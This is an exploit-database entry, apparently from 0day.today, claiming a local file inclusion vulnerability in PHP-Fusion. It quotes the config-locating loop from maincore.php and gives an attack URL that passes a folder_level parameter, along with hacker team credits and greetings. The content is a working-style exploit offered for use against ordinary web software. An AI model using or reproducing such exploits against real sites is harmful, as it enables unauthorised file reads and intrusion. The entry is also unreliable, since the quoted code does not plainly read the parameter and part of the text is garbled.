id: 13709
date: 08/15/2010
title: PHP-Fusion Local File Inclusion Vulnerability
author: MoDaMeR
cves: 

=============================================
PHP-Fusion Local File Inclusion Vulnerability
=============================================

# Author: MoDaMeR
# Email: k@live.ma
# My Sites : www.v4-team.com & www.hackteach.org
# Script home: http://www.phpfusion-ar.com
# download Script:
http://www.phpfusion-ar.com/downloads.php?cat_id=1&download_id=91
# Version:all
# Tested on: Linux
# Team hacker:Mr.Mo0oM & Dr.xp
                          ?????? ???? ????? ???
                         :::::::::::::::::::::::::
=================Exploit=================
maincore.php
[php]
 // Locate config.php and set the basedir path
$folder_level = ""; $i = 0;
while (!file_exists($folder_level."config.php")) {
    $folder_level .= "../"; $i++;
    if ($i == 5) { die("Config file not found"); }
}
require_once $folder_level."config.php";
define("BASEDIR", $folder_level);
[/php]
----exploit----
 
http://{localhost}/{path}/maincore.php?folder_level=LFI
 
---------greatz----------
Greatz to :
aB0 m0h4mM3d , and all v4-team & hackteach members



#  0day.today [2023-03-25]  #